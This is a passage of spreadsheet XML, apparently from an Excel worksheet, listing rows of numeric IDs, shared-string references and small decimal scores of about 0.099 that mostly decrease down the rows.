        <v>22188</v>
      </c>
      <c r="F25130" s="2">
        <v>0.09958071278825996</v>
      </c>
    </row>
    <row r="25131" ht="15.75" customHeight="1">
      <c r="A25131" s="1">
        <v>29747.0</v>
      </c>
      <c r="B25131" s="2">
        <v>3.4710829E7</v>
      </c>
      <c r="C25131" s="2" t="s">
        <v>24178</v>
      </c>
      <c r="D25131" s="2">
        <v>1.0</v>
      </c>
      <c r="E25131" s="3" t="s">
        <v>22188</v>
      </c>
      <c r="F25131" s="2">
        <v>0.09958071278825996</v>
      </c>
    </row>
    <row r="25132" ht="15.75" customHeight="1">
      <c r="A25132" s="1">
        <v>29252.0</v>
      </c>
      <c r="B25132" s="2">
        <v>3.0859498E7</v>
      </c>
      <c r="C25132" s="2" t="s">
        <v>24179</v>
      </c>
      <c r="D25132" s="2">
        <v>1.0</v>
      </c>
      <c r="E25132" s="3" t="s">
        <v>22188</v>
      </c>
      <c r="F25132" s="2">
        <v>0.09946236559139786</v>
      </c>
    </row>
    <row r="25133" ht="15.75" customHeight="1">
      <c r="A25133" s="1">
        <v>11949.0</v>
      </c>
      <c r="B25133" s="2">
        <v>2.5559737E7</v>
      </c>
      <c r="C25133" s="2" t="s">
        <v>24180</v>
      </c>
      <c r="D25133" s="2">
        <v>1.0</v>
      </c>
      <c r="E25133" s="3" t="s">
        <v>22188</v>
      </c>
      <c r="F25133" s="2">
        <v>0.09946236559139784</v>
      </c>
    </row>
    <row r="25134" ht="15.75" customHeight="1">
      <c r="A25134" s="1">
        <v>67.0</v>
      </c>
      <c r="B25134" s="2">
        <v>1.1478652E7</v>
      </c>
      <c r="C25134" s="2" t="s">
        <v>24181</v>
      </c>
      <c r="D25134" s="2">
        <v>1.0</v>
      </c>
      <c r="E25134" s="3" t="s">
        <v>22188</v>
      </c>
      <c r="F25134" s="2">
        <v>0.09935897435897435</v>
      </c>
    </row>
    <row r="25135" ht="15.75" customHeight="1">
      <c r="A25135" s="1">
        <v>426.0</v>
      </c>
      <c r="B25135" s="2">
        <v>1.6912244E7</v>
      </c>
      <c r="C25135" s="2" t="s">
        <v>24182</v>
      </c>
      <c r="D25135" s="2">
        <v>1.0</v>
      </c>
      <c r="E25135" s="3" t="s">
        <v>22188</v>
      </c>
      <c r="F25135" s="2">
        <v>0.09935897435897435</v>
      </c>
    </row>
    <row r="25136" ht="15.75" customHeight="1">
      <c r="A25136" s="1">
        <v>539.0</v>
      </c>
      <c r="B25136" s="2">
        <v>1.8650688E7</v>
      </c>
      <c r="C25136" s="2" t="s">
        <v>24183</v>
      </c>
      <c r="D25136" s="2">
        <v>1.0</v>
      </c>
      <c r="E25136" s="3" t="s">
        <v>22188</v>
      </c>
      <c r="F25136" s="2">
        <v>0.09935897435897435</v>
      </c>
    </row>
    <row r="25137" ht="15.75" customHeight="1">
      <c r="A25137" s="1">
        <v>707.0</v>
      </c>
      <c r="B25137" s="2">
        <v>2.0532769E7</v>
      </c>
      <c r="C25137" s="2" t="s">
        <v>24184</v>
      </c>
      <c r="D25137" s="2">
        <v>1.0</v>
      </c>
      <c r="E25137" s="3" t="s">
        <v>22188</v>
      </c>
      <c r="F25137" s="2">
        <v>0.09935897435897435</v>
      </c>
    </row>
    <row r="25138" ht="15.75" customHeight="1">
      <c r="A25138" s="1">
        <v>1060.0</v>
      </c>
      <c r="B25138" s="2">
        <v>2.3454629E7</v>
      </c>
      <c r="C25138" s="2" t="s">
        <v>24185</v>
      </c>
      <c r="D25138" s="2">
        <v>1.0</v>
      </c>
      <c r="E25138" s="3" t="s">
        <v>22188</v>
      </c>
      <c r="F25138" s="2">
        <v>0.09935897435897435</v>
      </c>
    </row>
    <row r="25139" ht="15.75" customHeight="1">
      <c r="A25139" s="1">
        <v>1813.0</v>
      </c>
      <c r="B25139" s="2">
        <v>2.9229537E7</v>
      </c>
      <c r="C25139" s="2" t="s">
        <v>24186</v>
      </c>
      <c r="D25139" s="2">
        <v>1.0</v>
      </c>
      <c r="E25139" s="3" t="s">
        <v>22188</v>
      </c>
      <c r="F25139" s="2">
        <v>0.09935897435897435</v>
      </c>
    </row>
    <row r="25140" ht="15.75" customHeight="1">
      <c r="A25140" s="1">
        <v>1820.0</v>
      </c>
      <c r="B25140" s="2">
        <v>2.9264982E7</v>
      </c>
      <c r="C25140" s="2" t="s">
        <v>24187</v>
      </c>
      <c r="D25140" s="2">
        <v>1.0</v>
      </c>
      <c r="E25140" s="3" t="s">
        <v>22188</v>
      </c>
      <c r="F25140" s="2">
        <v>0.09935897435897435</v>
      </c>
    </row>
    <row r="25141" ht="15.75" customHeight="1">
      <c r="A25141" s="1">
        <v>2196.0</v>
      </c>
      <c r="B25141" s="2">
        <v>3.2022613E7</v>
      </c>
      <c r="C25141" s="2" t="s">
        <v>24188</v>
      </c>
      <c r="D25141" s="2">
        <v>1.0</v>
      </c>
      <c r="E25141" s="3" t="s">
        <v>22188</v>
      </c>
      <c r="F25141" s="2">
        <v>0.09935897435897435</v>
      </c>
    </row>
    <row r="25142" ht="15.75" customHeight="1">
      <c r="A25142" s="1">
        <v>3245.0</v>
      </c>
      <c r="B25142" s="2">
        <v>3.7381225E7</v>
      </c>
      <c r="C25142" s="2" t="s">
        <v>24189</v>
      </c>
      <c r="D25142" s="2">
        <v>1.0</v>
      </c>
      <c r="E25142" s="3" t="s">
        <v>22188</v>
      </c>
      <c r="F25142" s="2">
        <v>0.09935897435897435</v>
      </c>
    </row>
    <row r="25143" ht="15.75" customHeight="1">
      <c r="A25143" s="1">
        <v>3714.0</v>
      </c>
      <c r="B25143" s="2">
        <v>3.9605114E7</v>
      </c>
      <c r="C25143" s="2" t="s">
        <v>24190</v>
      </c>
      <c r="D25143" s="2">
        <v>1.0</v>
      </c>
      <c r="E25143" s="3" t="s">
        <v>22188</v>
      </c>
      <c r="F25143" s="2">
        <v>0.09935897435897435</v>
      </c>
    </row>
    <row r="25144" ht="15.75" customHeight="1">
      <c r="A25144" s="1">
        <v>4463.0</v>
      </c>
      <c r="B25144" s="2">
        <v>4.2458476E7</v>
      </c>
      <c r="C25144" s="2" t="s">
        <v>24191</v>
      </c>
      <c r="D25144" s="2">
        <v>1.0</v>
      </c>
      <c r="E25144" s="3" t="s">
        <v>22188</v>
      </c>
      <c r="F25144" s="2">
        <v>0.09935897435897435</v>
      </c>
    </row>
    <row r="25145" ht="15.75" customHeight="1">
      <c r="A25145" s="1">
        <v>5381.0</v>
      </c>
      <c r="B25145" s="2">
        <v>4.5411328E7</v>
      </c>
      <c r="C25145" s="2" t="s">
        <v>24192</v>
      </c>
      <c r="D25145" s="2">
        <v>1.0</v>
      </c>
      <c r="E25145" s="3" t="s">
        <v>22188</v>
      </c>
      <c r="F25145" s="2">
        <v>0.09935897435897435</v>
      </c>
    </row>
    <row r="25146" ht="15.75" customHeight="1">
      <c r="A25146" s="1">
        <v>5585.0</v>
      </c>
      <c r="B25146" s="2">
        <v>4.607468E7</v>
      </c>
      <c r="C25146" s="2" t="s">
        <v>24193</v>
      </c>
      <c r="D25146" s="2">
        <v>1.0</v>
      </c>
      <c r="E25146" s="3" t="s">
        <v>22188</v>
      </c>
      <c r="F25146" s="2">
        <v>0.09935897435897435</v>
      </c>
    </row>
    <row r="25147" ht="15.75" customHeight="1">
      <c r="A25147" s="1">
        <v>6603.0</v>
      </c>
      <c r="B25147" s="2">
        <v>4.901336E7</v>
      </c>
      <c r="C25147" s="2" t="s">
        <v>24194</v>
      </c>
      <c r="D25147" s="2">
        <v>1.0</v>
      </c>
      <c r="E25147" s="3" t="s">
        <v>22188</v>
      </c>
      <c r="F25147" s="2">
        <v>0.09935897435897435</v>
      </c>
    </row>
    <row r="25148" ht="15.75" customHeight="1">
      <c r="A25148" s="1">
        <v>6705.0</v>
      </c>
      <c r="B25148" s="2">
        <v>4.9230981E7</v>
      </c>
      <c r="C25148" s="2" t="s">
        <v>24195</v>
      </c>
      <c r="D25148" s="2">
        <v>1.0</v>
      </c>
      <c r="E25148" s="3" t="s">
        <v>22188</v>
      </c>
      <c r="F25148" s="2">
        <v>0.09935897435897435</v>
      </c>
    </row>
    <row r="25149" ht="15.75" customHeight="1">
      <c r="A25149" s="1">
        <v>8290.0</v>
      </c>
      <c r="B25149" s="2">
        <v>5.3523686E7</v>
      </c>
      <c r="C25149" s="2" t="s">
        <v>24196</v>
      </c>
      <c r="D25149" s="2">
        <v>1.0</v>
      </c>
      <c r="E25149" s="3" t="s">
        <v>22188</v>
      </c>
      <c r="F25149" s="2">
        <v>0.09935897435897435</v>
      </c>
    </row>
    <row r="25150" ht="15.75" customHeight="1">
      <c r="A25150" s="1">
        <v>8644.0</v>
      </c>
      <c r="B25150" s="2">
        <v>5.4339297E7</v>
      </c>
      <c r="C25150" s="2" t="s">
        <v>24197</v>
      </c>
      <c r="D25150" s="2">
        <v>1.0</v>
      </c>
      <c r="E25150" s="3" t="s">
        <v>22188</v>
      </c>
      <c r="F25150" s="2">
        <v>0.09935897435897435</v>
      </c>
    </row>
    <row r="25151" ht="15.75" customHeight="1">
      <c r="A25151" s="1">
        <v>10031.0</v>
      </c>
      <c r="B25151" s="2">
        <v>5.7055232E7</v>
      </c>
      <c r="C25151" s="2" t="s">
        <v>24198</v>
      </c>
      <c r="D25151" s="2">
        <v>1.0</v>
      </c>
      <c r="E25151" s="3" t="s">
        <v>22188</v>
      </c>
      <c r="F25151" s="2">
        <v>0.09935897435897435</v>
      </c>
    </row>
    <row r="25152" ht="15.75" customHeight="1">
      <c r="A25152" s="1">
        <v>10231.0</v>
      </c>
      <c r="B25152" s="2">
        <v>5.7482792E7</v>
      </c>
      <c r="C25152" s="2" t="s">
        <v>24199</v>
      </c>
      <c r="D25152" s="2">
        <v>1.0</v>
      </c>
      <c r="E25152" s="3" t="s">
        <v>22188</v>
      </c>
      <c r="F25152" s="2">
        <v>0.09935897435897435</v>
      </c>
    </row>
    <row r="25153" ht="15.75" customHeight="1">
      <c r="A25153" s="1">
        <v>10447.0</v>
      </c>
      <c r="B25153" s="2">
        <v>1.0528446E7</v>
      </c>
      <c r="C25153" s="2" t="s">
        <v>24200</v>
      </c>
      <c r="D25153" s="2">
        <v>1.0</v>
      </c>
      <c r="E25153" s="3" t="s">
        <v>22188</v>
      </c>
      <c r="F25153" s="2">
        <v>0.09935897435897435</v>
      </c>
    </row>
    <row r="25154" ht="15.75" customHeight="1">
      <c r="A25154" s="1">
        <v>11365.0</v>
      </c>
      <c r="B25154" s="2">
        <v>2.1371695E7</v>
      </c>
      <c r="C25154" s="2" t="s">
        <v>24201</v>
      </c>
      <c r="D25154" s="2">
        <v>1.0</v>
      </c>
      <c r="E25154" s="3" t="s">
        <v>22188</v>
      </c>
      <c r="F25154" s="2">
        <v>0.09935897435897435</v>
      </c>
    </row>
    <row r="25155" ht="15.75" customHeight="1">
      <c r="A25155" s="1">
        <v>11790.0</v>
      </c>
      <c r="B25155" s="2">
        <v>2.4360304E7</v>
      </c>
      <c r="C25155" s="2" t="s">
        <v>24202</v>
      </c>
      <c r="D25155" s="2">
        <v>1.0</v>
      </c>
      <c r="E25155" s="3" t="s">
        <v>22188</v>
      </c>
      <c r="F25155" s="2">
        <v>0.09935897435897435</v>
      </c>
    </row>
    <row r="25156" ht="15.75" customHeight="1">
      <c r="A25156" s="1">
        <v>12394.0</v>
      </c>
      <c r="B25156" s="2">
        <v>2.8923148E7</v>
      </c>
      <c r="C25156" s="2" t="s">
        <v>24203</v>
      </c>
      <c r="D25156" s="2">
        <v>1.0</v>
      </c>
      <c r="E25156" s="3" t="s">
        <v>22188</v>
      </c>
      <c r="F25156" s="2">
        <v>0.09935897435897435</v>
      </c>
    </row>
    <row r="25157" ht="15.75" customHeight="1">
      <c r="A25157" s="1">
        <v>12640.0</v>
      </c>
      <c r="B25157" s="2">
        <v>3.0357362E7</v>
      </c>
      <c r="C25157" s="2" t="s">
        <v>24204</v>
      </c>
      <c r="D25157" s="2">
        <v>1.0</v>
      </c>
      <c r="E25157" s="3" t="s">
        <v>22188</v>
      </c>
      <c r="F25157" s="2">
        <v>0.09935897435897435</v>
      </c>
    </row>
    <row r="25158" ht="15.75" customHeight="1">
      <c r="A25158" s="1">
        <v>12670.0</v>
      </c>
      <c r="B25158" s="2">
        <v>3.0584967E7</v>
      </c>
      <c r="C25158" s="2" t="s">
        <v>24205</v>
      </c>
      <c r="D25158" s="2">
        <v>1.0</v>
      </c>
      <c r="E25158" s="3" t="s">
        <v>22188</v>
      </c>
      <c r="F25158" s="2">
        <v>0.09935897435897435</v>
      </c>
    </row>
    <row r="25159" ht="15.75" customHeight="1">
      <c r="A25159" s="1">
        <v>13602.0</v>
      </c>
      <c r="B25159" s="2">
        <v>3.5791467E7</v>
      </c>
      <c r="C25159" s="2" t="s">
        <v>24206</v>
      </c>
      <c r="D25159" s="2">
        <v>1.0</v>
      </c>
      <c r="E25159" s="3" t="s">
        <v>22188</v>
      </c>
      <c r="F25159" s="2">
        <v>0.09935897435897435</v>
      </c>
    </row>
    <row r="25160" ht="15.75" customHeight="1">
      <c r="A25160" s="1">
        <v>14049.0</v>
      </c>
      <c r="B25160" s="2">
        <v>3.7525396E7</v>
      </c>
      <c r="C25160" s="2" t="s">
        <v>24207</v>
      </c>
      <c r="D25160" s="2">
        <v>1.0</v>
      </c>
      <c r="E25160" s="3" t="s">
        <v>22188</v>
      </c>
      <c r="F25160" s="2">
        <v>0.09935897435897435</v>
      </c>
    </row>
    <row r="25161" ht="15.75" customHeight="1">
      <c r="A25161" s="1">
        <v>14359.0</v>
      </c>
      <c r="B25161" s="2">
        <v>3.89462E7</v>
      </c>
      <c r="C25161" s="2" t="s">
        <v>24208</v>
      </c>
      <c r="D25161" s="2">
        <v>1.0</v>
      </c>
      <c r="E25161" s="3" t="s">
        <v>22188</v>
      </c>
      <c r="F25161" s="2">
        <v>0.09935897435897435</v>
      </c>
    </row>
    <row r="25162" ht="15.75" customHeight="1">
      <c r="A25162" s="1">
        <v>16481.0</v>
      </c>
      <c r="B25162" s="2">
        <v>4.6521411E7</v>
      </c>
      <c r="C25162" s="2" t="s">
        <v>24209</v>
      </c>
      <c r="D25162" s="2">
        <v>1.0</v>
      </c>
      <c r="E25162" s="3" t="s">
        <v>22188</v>
      </c>
      <c r="F25162" s="2">
        <v>0.09935897435897435</v>
      </c>
    </row>
    <row r="25163" ht="15.75" customHeight="1">
      <c r="A25163" s="1">
        <v>16707.0</v>
      </c>
      <c r="B25163" s="2">
        <v>4.7417133E7</v>
      </c>
      <c r="C25163" s="2" t="s">
        <v>24210</v>
      </c>
      <c r="D25163" s="2">
        <v>1.0</v>
      </c>
      <c r="E25163" s="3" t="s">
        <v>22188</v>
      </c>
      <c r="F25163" s="2">
        <v>0.09935897435897435</v>
      </c>
    </row>
    <row r="25164" ht="15.75" customHeight="1">
      <c r="A25164" s="1">
        <v>16996.0</v>
      </c>
      <c r="B25164" s="2">
        <v>4.8393041E7</v>
      </c>
      <c r="C25164" s="2" t="s">
        <v>24211</v>
      </c>
      <c r="D25164" s="2">
        <v>1.0</v>
      </c>
      <c r="E25164" s="3" t="s">
        <v>22188</v>
      </c>
      <c r="F25164" s="2">
        <v>0.09935897435897435</v>
      </c>
    </row>
    <row r="25165" ht="15.75" customHeight="1">
      <c r="A25165" s="1">
        <v>19182.0</v>
      </c>
      <c r="B25165" s="2">
        <v>5.4973931E7</v>
      </c>
      <c r="C25165" s="2" t="s">
        <v>24212</v>
      </c>
      <c r="D25165" s="2">
        <v>1.0</v>
      </c>
      <c r="E25165" s="3" t="s">
        <v>22188</v>
      </c>
      <c r="F25165" s="2">
        <v>0.09935897435897435</v>
      </c>
    </row>
    <row r="25166" ht="15.75" customHeight="1">
      <c r="A25166" s="1">
        <v>20191.0</v>
      </c>
      <c r="B25166" s="2">
        <v>1.0504959E7</v>
      </c>
      <c r="C25166" s="2" t="s">
        <v>24213</v>
      </c>
      <c r="D25166" s="2">
        <v>1.0</v>
      </c>
      <c r="E25166" s="3" t="s">
        <v>22188</v>
      </c>
      <c r="F25166" s="2">
        <v>0.09935897435897435</v>
      </c>
    </row>
    <row r="25167" ht="15.75" customHeight="1">
      <c r="A25167" s="1">
        <v>20370.0</v>
      </c>
      <c r="B25167" s="2">
        <v>1.1815342E7</v>
      </c>
      <c r="C25167" s="2" t="s">
        <v>24214</v>
      </c>
      <c r="D25167" s="2">
        <v>1.0</v>
      </c>
      <c r="E25167" s="3" t="s">
        <v>22188</v>
      </c>
      <c r="F25167" s="2">
        <v>0.09935897435897435</v>
      </c>
    </row>
    <row r="25168" ht="15.75" customHeight="1">
      <c r="A25168" s="1">
        <v>20729.0</v>
      </c>
      <c r="B25168" s="2">
        <v>1.4699432E7</v>
      </c>
      <c r="C25168" s="2" t="s">
        <v>24215</v>
      </c>
      <c r="D25168" s="2">
        <v>1.0</v>
      </c>
      <c r="E25168" s="3" t="s">
        <v>22188</v>
      </c>
      <c r="F25168" s="2">
        <v>0.09935897435897435</v>
      </c>
    </row>
    <row r="25169" ht="15.75" customHeight="1">
      <c r="A25169" s="1">
        <v>22099.0</v>
      </c>
      <c r="B25169" s="2">
        <v>3.0823925E7</v>
      </c>
      <c r="C25169" s="2" t="s">
        <v>24216</v>
      </c>
      <c r="D25169" s="2">
        <v>1.0</v>
      </c>
      <c r="E25169" s="3" t="s">
        <v>22188</v>
      </c>
      <c r="F25169" s="2">
        <v>0.09935897435897435</v>
      </c>
    </row>
    <row r="25170" ht="15.75" customHeight="1">
      <c r="A25170" s="1">
        <v>22111.0</v>
      </c>
      <c r="B25170" s="2">
        <v>3.0951873E7</v>
      </c>
      <c r="C25170" s="2" t="s">
        <v>24217</v>
      </c>
      <c r="D25170" s="2">
        <v>1.0</v>
      </c>
      <c r="E25170" s="3" t="s">
        <v>22188</v>
      </c>
      <c r="F25170" s="2">
        <v>0.09935897435897435</v>
      </c>
    </row>
    <row r="25171" ht="15.75" customHeight="1">
      <c r="A25171" s="1">
        <v>22454.0</v>
      </c>
      <c r="B25171" s="2">
        <v>3625257.0</v>
      </c>
      <c r="C25171" s="2" t="s">
        <v>24218</v>
      </c>
      <c r="D25171" s="2">
        <v>1.0</v>
      </c>
      <c r="E25171" s="3" t="s">
        <v>22188</v>
      </c>
      <c r="F25171" s="2">
        <v>0.09935897435897435</v>
      </c>
    </row>
    <row r="25172" ht="15.75" customHeight="1">
      <c r="A25172" s="1">
        <v>22988.0</v>
      </c>
      <c r="B25172" s="2">
        <v>4.9418531E7</v>
      </c>
      <c r="C25172" s="2" t="s">
        <v>24219</v>
      </c>
      <c r="D25172" s="2">
        <v>1.0</v>
      </c>
      <c r="E25172" s="3" t="s">
        <v>22188</v>
      </c>
      <c r="F25172" s="2">
        <v>0.09935897435897435</v>
      </c>
    </row>
    <row r="25173" ht="15.75" customHeight="1">
      <c r="A25173" s="1">
        <v>23336.0</v>
      </c>
      <c r="B25173" s="2">
        <v>5.4699839E7</v>
      </c>
      <c r="C25173" s="2" t="s">
        <v>24220</v>
      </c>
      <c r="D25173" s="2">
        <v>1.0</v>
      </c>
      <c r="E25173" s="3" t="s">
        <v>22188</v>
      </c>
      <c r="F25173" s="2">
        <v>0.09935897435897435</v>
      </c>
    </row>
    <row r="25174" ht="15.75" customHeight="1">
      <c r="A25174" s="1">
        <v>23552.0</v>
      </c>
      <c r="B25174" s="2">
        <v>6069506.0</v>
      </c>
      <c r="C25174" s="2" t="s">
        <v>24221</v>
      </c>
      <c r="D25174" s="2">
        <v>1.0</v>
      </c>
      <c r="E25174" s="3" t="s">
        <v>22188</v>
      </c>
      <c r="F25174" s="2">
        <v>0.09935897435897435</v>
      </c>
    </row>
    <row r="25175" ht="15.75" customHeight="1">
      <c r="A25175" s="1">
        <v>24252.0</v>
      </c>
      <c r="B25175" s="2">
        <v>1.0504958E7</v>
      </c>
      <c r="C25175" s="2" t="s">
        <v>24213</v>
      </c>
      <c r="D25175" s="2">
        <v>1.0</v>
      </c>
      <c r="E25175" s="3" t="s">
        <v>22188</v>
      </c>
      <c r="F25175" s="2">
        <v>0.09935897435897435</v>
      </c>
    </row>
    <row r="25176" ht="15.75" customHeight="1">
      <c r="A25176" s="1">
        <v>24799.0</v>
      </c>
      <c r="B25176" s="2">
        <v>1.1992965E7</v>
      </c>
      <c r="C25176" s="2" t="s">
        <v>24222</v>
      </c>
      <c r="D25176" s="2">
        <v>1.0</v>
      </c>
      <c r="E25176" s="3" t="s">
        <v>22188</v>
      </c>
      <c r="F25176" s="2">
        <v>0.09935897435897435</v>
      </c>
    </row>
    <row r="25177" ht="15.75" customHeight="1">
      <c r="A25177" s="1">
        <v>25166.0</v>
      </c>
      <c r="B25177" s="2">
        <v>1.3092512E7</v>
      </c>
      <c r="C25177" s="2" t="s">
        <v>24223</v>
      </c>
      <c r="D25177" s="2">
        <v>1.0</v>
      </c>
      <c r="E25177" s="3" t="s">
        <v>22188</v>
      </c>
      <c r="F25177" s="2">
        <v>0.09935897435897435</v>
      </c>
    </row>
    <row r="25178" ht="15.75" customHeight="1">
      <c r="A25178" s="1">
        <v>25821.0</v>
      </c>
      <c r="B25178" s="2">
        <v>1.4769933E7</v>
      </c>
      <c r="C25178" s="2" t="s">
        <v>24224</v>
      </c>
      <c r="D25178" s="2">
        <v>1.0</v>
      </c>
      <c r="E25178" s="3" t="s">
        <v>22188</v>
      </c>
      <c r="F25178" s="2">
        <v>0.09935897435897435</v>
      </c>
    </row>
    <row r="25179" ht="15.75" customHeight="1">
      <c r="A25179" s="1">
        <v>26702.0</v>
      </c>
      <c r="B25179" s="2">
        <v>1.8185033E7</v>
      </c>
      <c r="C25179" s="2" t="s">
        <v>24225</v>
      </c>
      <c r="D25179" s="2">
        <v>1.0</v>
      </c>
      <c r="E25179" s="3" t="s">
        <v>22188</v>
      </c>
      <c r="F25179" s="2">
        <v>0.09935897435897435</v>
      </c>
    </row>
    <row r="25180" ht="15.75" customHeight="1">
      <c r="A25180" s="1">
        <v>27306.0</v>
      </c>
      <c r="B25180" s="2">
        <v>2.1365237E7</v>
      </c>
      <c r="C25180" s="2" t="s">
        <v>24226</v>
      </c>
      <c r="D25180" s="2">
        <v>1.0</v>
      </c>
      <c r="E25180" s="3" t="s">
        <v>22188</v>
      </c>
      <c r="F25180" s="2">
        <v>0.09935897435897435</v>
      </c>
    </row>
    <row r="25181" ht="15.75" customHeight="1">
      <c r="A25181" s="1">
        <v>27404.0</v>
      </c>
      <c r="B25181" s="2">
        <v>2.180254E7</v>
      </c>
      <c r="C25181" s="2" t="s">
        <v>24227</v>
      </c>
      <c r="D25181" s="2">
        <v>1.0</v>
      </c>
      <c r="E25181" s="3" t="s">
        <v>22188</v>
      </c>
      <c r="F25181" s="2">
        <v>0.09935897435897435</v>
      </c>
    </row>
    <row r="25182" ht="15.75" customHeight="1">
      <c r="A25182" s="1">
        <v>27733.0</v>
      </c>
      <c r="B25182" s="2">
        <v>2.3080381E7</v>
      </c>
      <c r="C25182" s="2" t="s">
        <v>24228</v>
      </c>
      <c r="D25182" s="2">
        <v>1.0</v>
      </c>
      <c r="E25182" s="3" t="s">
        <v>22188</v>
      </c>
      <c r="F25182" s="2">
        <v>0.09935897435897435</v>
      </c>
    </row>
    <row r="25183" ht="15.75" customHeight="1">
      <c r="A25183" s="1">
        <v>28049.0</v>
      </c>
      <c r="B25183" s="2">
        <v>2.4556083E7</v>
      </c>
      <c r="C25183" s="2" t="s">
        <v>24229</v>
      </c>
      <c r="D25183" s="2">
        <v>1.0</v>
      </c>
      <c r="E25183" s="3" t="s">
        <v>22188</v>
      </c>
      <c r="F25183" s="2">
        <v>0.09935897435897435</v>
      </c>
    </row>
    <row r="25184" ht="15.75" customHeight="1">
      <c r="A25184" s="1">
        <v>31253.0</v>
      </c>
      <c r="B25184" s="2">
        <v>4.941853E7</v>
      </c>
      <c r="C25184" s="2" t="s">
        <v>24219</v>
      </c>
      <c r="D25184" s="2">
        <v>1.0</v>
      </c>
      <c r="E25184" s="3" t="s">
        <v>22188</v>
      </c>
      <c r="F25184" s="2">
        <v>0.09935897435897435</v>
      </c>
    </row>
    <row r="25185" ht="15.75" customHeight="1">
      <c r="A25185" s="1">
        <v>31794.0</v>
      </c>
      <c r="B25185" s="2">
        <v>5237006.0</v>
      </c>
      <c r="C25185" s="2" t="s">
        <v>24230</v>
      </c>
      <c r="D25185" s="2">
        <v>1.0</v>
      </c>
      <c r="E25185" s="3" t="s">
        <v>22188</v>
      </c>
      <c r="F25185" s="2">
        <v>0.09935897435897435</v>
      </c>
    </row>
    <row r="25186" ht="15.75" customHeight="1">
      <c r="A25186" s="1">
        <v>32415.0</v>
      </c>
      <c r="B25186" s="2">
        <v>5641239.0</v>
      </c>
      <c r="C25186" s="2" t="s">
        <v>24231</v>
      </c>
      <c r="D25186" s="2">
        <v>1.0</v>
      </c>
      <c r="E25186" s="3" t="s">
        <v>22188</v>
      </c>
      <c r="F25186" s="2">
        <v>0.09935897435897435</v>
      </c>
    </row>
    <row r="25187" ht="15.75" customHeight="1">
      <c r="A25187" s="1">
        <v>32998.0</v>
      </c>
      <c r="B25187" s="2">
        <v>6615466.0</v>
      </c>
      <c r="C25187" s="2" t="s">
        <v>24232</v>
      </c>
      <c r="D25187" s="2">
        <v>1.0</v>
      </c>
      <c r="E25187" s="3" t="s">
        <v>22188</v>
      </c>
      <c r="F25187" s="2">
        <v>0.09935897435897435</v>
      </c>
    </row>
    <row r="25188" ht="15.75" customHeight="1">
      <c r="A25188" s="1">
        <v>33486.0</v>
      </c>
      <c r="B25188" s="2">
        <v>7997737.0</v>
      </c>
      <c r="C25188" s="2" t="s">
        <v>24233</v>
      </c>
      <c r="D25188" s="2">
        <v>1.0</v>
      </c>
      <c r="E25188" s="3" t="s">
        <v>22188</v>
      </c>
      <c r="F25188" s="2">
        <v>0.09935897435897435</v>
      </c>
    </row>
    <row r="25189" ht="15.75" customHeight="1">
      <c r="A25189" s="1">
        <v>34203.0</v>
      </c>
      <c r="B25189" s="2">
        <v>1.5204153E7</v>
      </c>
      <c r="C25189" s="2" t="s">
        <v>24234</v>
      </c>
      <c r="D25189" s="2">
        <v>1.0</v>
      </c>
      <c r="E25189" s="3" t="s">
        <v>22188</v>
      </c>
      <c r="F25189" s="2">
        <v>0.09935897435897435</v>
      </c>
    </row>
    <row r="25190" ht="15.75" customHeight="1">
      <c r="A25190" s="1">
        <v>3205.0</v>
      </c>
      <c r="B25190" s="2">
        <v>3.7281637E7</v>
      </c>
      <c r="C25190" s="2" t="s">
        <v>24235</v>
      </c>
      <c r="D25190" s="2">
        <v>1.0</v>
      </c>
      <c r="E25190" s="3" t="s">
        <v>22188</v>
      </c>
      <c r="F25190" s="2">
        <v>0.09912854030501088</v>
      </c>
    </row>
    <row r="25191" ht="15.75" customHeight="1">
      <c r="A25191" s="1">
        <v>4763.0</v>
      </c>
      <c r="B25191" s="2">
        <v>4.3429617E7</v>
      </c>
      <c r="C25191" s="2" t="s">
        <v>24236</v>
      </c>
      <c r="D25191" s="2">
        <v>1.0</v>
      </c>
      <c r="E25191" s="3" t="s">
        <v>22188</v>
      </c>
      <c r="F25191" s="2">
        <v>0.09912854030501088</v>
      </c>
    </row>
    <row r="25192" ht="15.75" customHeight="1">
      <c r="A25192" s="1">
        <v>11551.0</v>
      </c>
      <c r="B25192" s="2">
        <v>2.2690125E7</v>
      </c>
      <c r="C25192" s="2" t="s">
        <v>24237</v>
      </c>
      <c r="D25192" s="2">
        <v>1.0</v>
      </c>
      <c r="E25192" s="3" t="s">
        <v>22188</v>
      </c>
      <c r="F25192" s="2">
        <v>0.09912854030501088</v>
      </c>
    </row>
    <row r="25193" ht="15.75" customHeight="1">
      <c r="A25193" s="1">
        <v>11880.0</v>
      </c>
      <c r="B25193" s="2">
        <v>2.5048895E7</v>
      </c>
      <c r="C25193" s="2" t="s">
        <v>24238</v>
      </c>
      <c r="D25193" s="2">
        <v>1.0</v>
      </c>
      <c r="E25193" s="3" t="s">
        <v>22188</v>
      </c>
      <c r="F25193" s="2">
        <v>0.09912854030501088</v>
      </c>
    </row>
    <row r="25194" ht="15.75" customHeight="1">
      <c r="A25194" s="1">
        <v>14289.0</v>
      </c>
      <c r="B25194" s="2">
        <v>3.8501619E7</v>
      </c>
      <c r="C25194" s="2" t="s">
        <v>24239</v>
      </c>
      <c r="D25194" s="2">
        <v>1.0</v>
      </c>
      <c r="E25194" s="3" t="s">
        <v>22188</v>
      </c>
      <c r="F25194" s="2">
        <v>0.09912854030501088</v>
      </c>
    </row>
    <row r="25195" ht="15.75" customHeight="1">
      <c r="A25195" s="1">
        <v>16501.0</v>
      </c>
      <c r="B25195" s="2">
        <v>4.6592627E7</v>
      </c>
      <c r="C25195" s="2" t="s">
        <v>24240</v>
      </c>
      <c r="D25195" s="2">
        <v>1.0</v>
      </c>
      <c r="E25195" s="3" t="s">
        <v>22188</v>
      </c>
      <c r="F25195" s="2">
        <v>0.09912854030501088</v>
      </c>
    </row>
    <row r="25196" ht="15.75" customHeight="1">
      <c r="A25196" s="1">
        <v>23995.0</v>
      </c>
      <c r="B25196" s="2">
        <v>9222962.0</v>
      </c>
      <c r="C25196" s="2" t="s">
        <v>24241</v>
      </c>
      <c r="D25196" s="2">
        <v>1.0</v>
      </c>
      <c r="E25196" s="3" t="s">
        <v>22188</v>
      </c>
      <c r="F25196" s="2">
        <v>0.09912854030501088</v>
      </c>
    </row>
    <row r="25197" ht="15.75" customHeight="1">
      <c r="A25197" s="1">
        <v>15598.0</v>
      </c>
      <c r="B25197" s="2">
        <v>4.3478737E7</v>
      </c>
      <c r="C25197" s="2" t="s">
        <v>24242</v>
      </c>
      <c r="D25197" s="2">
        <v>1.0</v>
      </c>
      <c r="E25197" s="3" t="s">
        <v>22188</v>
      </c>
